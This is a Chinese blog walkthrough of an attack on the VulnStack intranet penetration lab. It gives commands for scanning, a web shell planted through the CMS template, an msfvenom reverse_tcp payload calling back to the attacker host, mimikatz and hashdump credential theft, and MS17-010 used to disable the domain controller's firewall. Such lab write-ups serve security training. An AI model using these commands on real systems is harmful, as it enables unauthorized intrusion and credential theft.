VulnStack靶场渗透测试

最新推荐文章于 2024-09-22 20:39:27 发布
最新推荐文章于 2024-09-22 20:39:27 发布
阅读量406 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x_sweelg/article/details/118571668
版权

渗透测试 安全

环境准备

环境拓扑图

 总共三台机器,除了win7是两张网卡,桥接和VMnet3,其他两台内网机器都是VMnet3

 kali和win7的桥接网卡模拟公网环境

一、信息收集

主机发现

netdiscover -i eth0 -r 192.168.1.0/24

目标IP:192.168.1.136

端口扫描

sudo masscan -p 1-65535 192.168.1.136 --rate=1000

目录扫描

gobuster -m dir -fw -u 192.168.1.136 -w /usr/share/wordlists/dirb/big.txt -t 50

看到有个phpMyAdmin

访问有弱口令root root

可以看到是yxcms的数据库

尝试访问http://192.168.1.136/yxcms/

公告信息有后台地址和密码

http://192.168.1.136/yxcms//index.php?r=admin

账户admin 密码123456

随后查看了robots.txt,有目录路径泄露

二、后台getshell

再管理首页-前台模板出插入一句话,再结合之前的路径泄露,getshell

蚁剑连接成功

三、内网信息收集

有两张网卡,192.168.52.143和192.168.1.136

也没有任何安全狗之类的安全设备,所以也不用做免杀

四、metasploit提权和内网信息收集

直接做个木马上传msf监听上线

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.162 lport=12345 -f exe >shell.exe

迁移进程到x64里面

直接尝试用攻击向量提权getsystem

通过mimikatz抓取到了本地管理员Administrator明文密码 hongrisec@20199

五、域内信息收集

msf容易掉线,所以cs上线后提权操作

域是GOD

域内所有计算机

域控机器名为OWA,另一台则叫ROOT-TVI862UBEH

获取域内登录过的用户信息

也可以用post模块后渗透直接定位域控

通过域内信息收集得到

两个IP段:192.168.1.136        192.168.52.143

域名:god.org

域管:owa

域管IP:192.168.52.138

六、添加代理渗透域控

添加路由

开启代理 use server/socks_proxy

proxychains设置代理nmap扫描内网 sudo vi /etc/proxychains4.conf 

扫描常用端口

开着445端口,扫描域控是否存在永恒之蓝ms17_010,确认后可以直接使用msf开打

打了几次也换了exp和payload都没有成功,原来没有关闭防火墙

所以使用ms17_010的远程命令执行关闭防火墙

set command netsh advfirewall set allprofiles state off

关闭防火墙之后用正向连接shell

windows/x64/meterpreter/bind_tcp

至此就打了域控的system权限

最后用mimikatz抓取密码

导出hash

run post/windows/gather/hashdump

Sweelg
关注
常见渗透测试靶场学习笔记
weixin_34220834的博客
04-24 2626
1.DVWA   作为新手,通常第一个听说的靶场应该就是DVWA,部署简单安装完对应版本的PAM(PHP-Apache-MySQL),简单配置后就可以使用。   1、DVWA靶场可测试漏洞:暴力破解(Brute Force)、命令注入(CommandInjection)、跨站请求伪造(CSRF)、文件包含(File Inclusion)、文件上传(File Upload)、不安全的验证码(I...
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 2889
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
DC-2靶场-渗透测试
negnegil的博客
06-06 724
靶机:DC-2 下载地址:https://www.vulnhub.com/entry/dc-2,311/ 下载后导入和kali相同的虚拟机平台即可 靶场的网络模式设置为桥接模式,启动 1.先以ARP扫描以下局网内靶机的ip arp-scan -l netdiscover、nmap、msf、powershell等常用工具也可以进行主机扫描,感兴趣可自行摸索 2.使用nmap扫一下ip查看端口开放 nmap功能很强大,不仅能够扫描端口,嗅探所提供的网络服务、还能探测存货主机、简单漏洞扫描和绕过防火墙
ATT&CK实战系列-Vulnstack三层网络渗透靶场(一)
最新发布
M372109150的博客
09-22 1412
本篇为红日安全的ATT&CK实战系列-红队评估 (一)Vulnstack三层网络渗透靶场靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 2257
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
完整的渗透测试靶场通关
NZXHJ的博客
07-15 2713
记录一次比较系统的内网渗透靶场通关的文章
实战项目 3 Linux DC-2 靶场渗透测试案例详解
m0_50572593的博客
06-22 2205
​ WordPress 是全球流行的博客网站,全球有上百万人使用它来搭建博客。他使用 PHP 脚本和 Mysql 数据库来搭建网站。WordPress 作为三大建站模板之一,在全世界范围内有大量的用户,这也导致白帽子都会去跟踪 WordPress 的安全漏洞。WordPress 自诞生起也出现了很多漏洞,同时它还可以使用插件、主题。于是当 WordPress 本身很难挖掘什么安全问题的时候,安全研究者开始研究其插件、主题的漏洞。通过插件,主题的漏洞去渗透 WordPress 站点。WPScan 扫描器介绍。
2024年最新Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场(1)
2401_84297265的博客
05-03 1721
该内网靶场渗透实验,大概得折腾了我整整 3-4 天才做完(而且各种攻击不畅……),其中 Win7 跳板机执行命令频繁报错如下(各种百度解决方案均行不通,如有知情大佬请赐教,感激不尽……
Vulnstack红日安全内网渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 968
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网环境靶场渗透过程。
记一次Vulnstack靶场内网渗透(五)
小王的储物间
07-25 498
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2237
红日靶场渗透教程
vuln靶场--Dr4g0n-b4ll
bobo_milk的博客
05-13 659
目录 一、信息收集 二、漏洞发现 三、权限提升 总结 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 ​​​​ nmap -A -v -T4 -p 1-65535 192.168.216.146 可以看到服务器开启了80端口和22ssh的端口以及一些服务器的信息,网站搭建的中间件以及版本等等信息。 二、漏洞发现 访问服务器的80端口 一个...
靶场复现渗透测试流程
sinat_38378265的博客
05-02 816
外网渗透 使用御剑扫描目录获取到管理员后台登陆界面。 (此处还有收集whois和ip等信息,由于是自己搭建的靶场就不搜集了) 使用nmap只能扫描到80端口开放。 然后登陆后台管理,尝试弱密码登陆,账号admin和密码admin123登陆成功。 登陆页面之后发现页面有上传文件,尝试直接上传一句话木马php,文件报错,而且有流量经过,说明不是js前端验证。然后尝试修改上传格式,添加了php格...
VulnStack靶场6
weixin_45568454的博客
11-04 383
打靶日记之VulnStack记录 记下了好多踩过的坑 以及一些小的心得体会
Vulnstack(1)
ppbgi的博客
05-25 319
信息收集 进行ip的扫描以及开放端口的探测: 扫描到有80端口,进行访问: 尝试在phpstuday中能获得的信息,发现有输入框,尝试弱口令: 发现可以登录,进行目录后台的扫描: 发现有phpmyadmin目录,进行登录: 然后尝试写入一句话木马来获取shell: show variables like '%general%'; #查看日志状态 SET GLOBAL general_log='on' #开启general set global general
Vulnstack(一)
小司机的奥拓
05-05 805
故我猜测,通过CS内置功能([beacon] → Pivoting → SOCKS Server)实现的SOCKS v4代理,实质上是通过反弹SOCKS v4服务器实现的:kali开启9050监听和xxx监听(将9050端口的流量转发至xxx端口)然后Win7反弹SOCKS v4服务器到kali的xxx端口。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。正常来说,拿到Win7的IP,然后开始我们的渗透之旅。
vuln靶场——DC-1
qq_54480761的博客
05-03 1574
我们切换语句进入shell,执行whoami查看当前的权限,执行ls查看当前目录下的文件,切换到root目录。典型的drupal,启动Metersploit,MSF存在drupal模块,尝试使用msf渗透。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。搜索Drupal 7的漏洞发现可利用的漏洞很多,搜索与Drupal 7相关的漏洞利用模块。登陆战点之后,随便点几个选项,例如左上角的Content,发现flag3。进行登录,密码是之前我们自己替换的。
vuln靶场--MoneyBox
bobo_milk的博客
05-12 999
文章目录 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 ​​​​ nmap -A -v -T4 -p 1-65535 192.168.216.145 可以看到服务器开启了80端口和22ssh的端口和21端口以及一些服务器的信息,网站搭建的中间件以及版本等等信息。 二、漏洞发现 访问服务器的80端口 一个非常普通的网站,在目前来看并不能发现什么业务功能,查看了一下源代码发现中间的按...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sweelg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值